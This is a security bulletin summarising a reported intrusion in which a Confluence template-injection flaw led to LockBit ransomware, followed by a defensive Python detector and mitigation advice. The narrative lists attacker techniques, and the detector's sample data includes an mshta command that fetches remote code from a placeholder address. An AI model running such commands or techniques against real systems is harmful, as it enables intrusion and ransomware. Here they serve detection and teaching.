Confluence Exploit Leads to LockBit Ransomware
Summary:
Researchers at The DFIR Report have uncovered details of an intrusion where LockBit ransomware was deployed by a threat actor within 2 hours of gaining initial access. The intrusion began with the compromise of an exposed Windows Confluence server that was vulnerable to a critical server-side template injection vulnerability in Confluence. Tracked as CVE-2023-22527, the flaw can enable unauthenticated actors to execute arbitrary commands on the target server by injecting Object-Graph Navigation Language (OGNL) expressions.
The first commands executed by the threat actor, 'net user' and 'whoami', were used to enumerate user accounts and gather information about the affected user. The actor then employed mshta, a native Windows utility, to retrieve and execute a Metasploit stager, establishing command and control with the Metasploit server. AnyDesk was installed for persistent access, and a new user, "backup," was created and added to the local "Administrators" group. This allowed the actor to remotely access the beachhead host via RDP, using a proxy connection through the Metasploit payload, and execute Mimikatz.
The execution of Mimikatz helped the actor identify an easily crackable hash for the 'Administrator' account on the beachhead, with researchers noting that the password was re-used across the hosts in the environment. This account was further used to facilitate lateral movement across the network and exfiltrate data of interest using tools like Rclone. From here, the actor was observed accessing a domain controller, enumerating admin group memberships, and using PDQ, a legitimate enterprise deployment tool, to distribute LockBit ransomware to multiple systems via SMB.
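The chain above gives defenders several concrete detection points before ransomware is staged: a web application process spawning reconnaissance commands, the same process tree launching mshta, and a freshly created local account being added to Administrators. The following Python is an added illustration written for this summary, not code from The DFIR Report or from the tooling it describes. The event schema, field names, timestamps, process IDs and the 192.0.2.10 address are all constructed; the assumption that the Confluence service runs as tomcat9.exe or java.exe is ours and should be replaced with whatever image name your own deployment uses. Map the event kinds onto your telemetry (for example Windows Security Event IDs 4688, 4720 and 4732, or EDR process and account events).

```python
"""Correlate host telemetry for the post-exploitation pattern described above.

Added example with constructed sample data; not the report's own code.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Assumed image names of the Confluence service process (site-specific).
WEB_SERVICE_IMAGES = {"tomcat9.exe", "java.exe"}
# Enumeration commands seen in the intrusion ('whoami', 'net user').
RECON_COMMANDS = {"whoami.exe", "net.exe", "net1.exe"}
# Native utility used to pull and run the stager.
STAGER_LOLBINS = {"mshta.exe"}
PRIVILEGED_GROUPS = {"administrators"}
# Account creation followed by admin group membership inside this window.
ESCALATION_WINDOW = timedelta(minutes=10)


@dataclass
class Event:
    ts: datetime
    kind: str                                   # process | user_created | group_member_added
    fields: Dict[str, str] = field(default_factory=dict)


def _process_index(events: List[Event]) -> Dict[str, Event]:
    return {e.fields["pid"]: e for e in events if e.kind == "process"}


def spawned_by_web_service(ev: Event, procs: Dict[str, Event], max_depth: int = 8) -> bool:
    """Walk the parent chain; True if a web service image is an ancestor.

    Handles the intermediate cmd.exe the exploit typically goes through.
    """
    ppid = ev.fields.get("ppid")
    for _ in range(max_depth):
        parent = procs.get(ppid)
        if parent is None:              # reached a process we have no event for
            return False
        if parent.fields["image"].lower() in WEB_SERVICE_IMAGES:
            return True
        ppid = parent.fields.get("ppid")
    return False


def detect_web_service_children(events: List[Event]) -> List[Tuple[str, str]]:
    """Flag recon commands and stager LOLBins descending from the web service."""
    procs = _process_index(events)
    alerts = []
    for e in events:
        if e.kind != "process":
            continue
        image = e.fields["image"].lower()
        if image in RECON_COMMANDS and spawned_by_web_service(e, procs):
            alerts.append(("recon_from_web_service", e.fields["cmdline"]))
        elif image in STAGER_LOLBINS and spawned_by_web_service(e, procs):
            alerts.append(("lolbin_from_web_service", e.fields["cmdline"]))
    return alerts


def detect_new_local_admin(events: List[Event], window: timedelta = ESCALATION_WINDOW) -> List[Tuple[str, str]]:
    """Flag an account created and added to a privileged group within the window."""
    created: Dict[str, datetime] = {}
    alerts = []
    for e in sorted(events, key=lambda x: x.ts):
        if e.kind == "user_created":
            created[e.fields["account"].lower()] = e.ts
        elif e.kind == "group_member_added":
            acct = e.fields["account"].lower()
            if (e.fields["group"].lower() in PRIVILEGED_GROUPS
                    and acct in created and e.ts - created[acct] <= window):
                alerts.append(("new_local_admin", acct))
    return alerts


def run_detections(events: List[Event]) -> List[Tuple[str, str]]:
    return detect_web_service_children(events) + detect_new_local_admin(events)


# Constructed timeline modelled on the narrative, plus benign noise.
T0 = datetime(2025, 1, 1, 12, 0, 0)
SAMPLE_EVENTS = [
    Event(T0, "process", {"pid": "1200", "ppid": "900", "image": "tomcat9.exe", "cmdline": "tomcat9.exe //RS//Confluence"}),
    Event(T0 + timedelta(seconds=1), "process", {"pid": "1300", "ppid": "1200", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"}),
    Event(T0 + timedelta(seconds=1), "process", {"pid": "1301", "ppid": "1300", "image": "whoami.exe", "cmdline": "whoami"}),
    Event(T0 + timedelta(seconds=5), "process", {"pid": "1310", "ppid": "1200", "image": "cmd.exe", "cmdline": "cmd.exe /c net user"}),
    Event(T0 + timedelta(seconds=5), "process", {"pid": "1311", "ppid": "1310", "image": "net.exe", "cmdline": "net user"}),
    Event(T0 + timedelta(seconds=40), "process", {"pid": "1400", "ppid": "1200", "image": "mshta.exe", "cmdline": "mshta.exe http://192.0.2.10/x.hta"}),
    Event(T0 + timedelta(minutes=5), "user_created", {"account": "backup"}),
    Event(T0 + timedelta(minutes=5, seconds=3), "group_member_added", {"account": "backup", "group": "Administrators"}),
    # Benign: an interactive user running whoami from Explorer, and a service account never made admin.
    Event(T0 + timedelta(minutes=1), "process", {"pid": "1900", "ppid": "1", "image": "explorer.exe", "cmdline": "explorer.exe"}),
    Event(T0 + timedelta(minutes=2), "process", {"pid": "2000", "ppid": "1900", "image": "cmd.exe", "cmdline": "cmd.exe /c whoami"}),
    Event(T0 + timedelta(minutes=2), "process", {"pid": "2001", "ppid": "2000", "image": "whoami.exe", "cmdline": "whoami"}),
    Event(T0 + timedelta(minutes=7), "user_created", {"account": "svc_report"}),
]

if __name__ == "__main__":
    for kind, detail in run_detections(SAMPLE_EVENTS):
        print(f"{kind}: {detail}")
```

On the sample timeline the detector raises four alerts (two recon commands and one mshta launch descending from the Confluence process, plus the "backup" account becoming a local administrator) and stays quiet on the Explorer-launched whoami and the unprivileged service account. In production, the new-local-admin rule alone is a high-fidelity signal on servers where account management is centrally controlled; the web-service-child rule is most useful when the parent chain is recorded, so confirm that your process telemetry carries parent PIDs before relying on it.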
Security Officer Comments:
The rapid deployment of ransomware within just two hours of gaining initial access underscores the increasing sophistication and efficiency of modern threat actors. This swift execution reflects a well-coordinated and automated attack strategy, where attackers can quickly move from exploitation to full system compromise, minimizing the chances of detection or response. Such fast-paced operations demonstrate a high level of preparation and a deep understanding of target environments, allowing threat actors to inflict maximum damage in a short timeframe. This trend emphasizes the need for robust defenses and rapid incident response capabilities to mitigate the impact of such attacks.
Suggested Corrections:
Back up your data, system images, and configurations, regularly test them, and keep the backups offline: Ensure that backups are regularly tested and that they are not connected to the business network, as many ransomware variants try to find and encrypt or delete accessible backups. Maintaining current backups offline is critical because if your network data is encrypted with ransomware, your organization can restore systems.
Update and patch systems promptly: This includes maintaining the security of operating systems, applications, and firmware in a timely manner. Consider using a centralized patch management system; use a risk-based assessment strategy to drive your patch management program.
Test your incident response plan: There's nothing that shows the gaps in plans more than testing them. Run through some core questions and use those to build an incident response plan: Are you able to sustain business operations without access to certain systems? For how long? Would you turn off your manufacturing operations if business systems such as billing were offline?
Check Your Security Team's Work: Use a third-party pen tester to test the security of your systems and your ability to defend against a sophisticated attack. Many ransomware criminals are aggressive and sophisticated and will find the equivalent of unlocked doors.
Segment your networks: There's been a recent shift in ransomware attacks – from stealing data to disrupting operations. It's critically important that your corporate business functions and manufacturing/production operations are separated and that you carefully filter and limit internet access to operational networks, identify links between these networks, and develop workarounds or manual controls to ensure ICS networks can be isolated and continue operating if your corporate network is compromised. Regularly test contingency plans such as manual controls so that safety-critical functions can be maintained during a cyber incident.
Train employees: Email remains the most vulnerable attack vector for organizations. Users should be trained on how to avoid and spot phishing emails. Multi-factor authentication can help prevent malicious access to sensitive services.
Link(s):
https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/#initial-access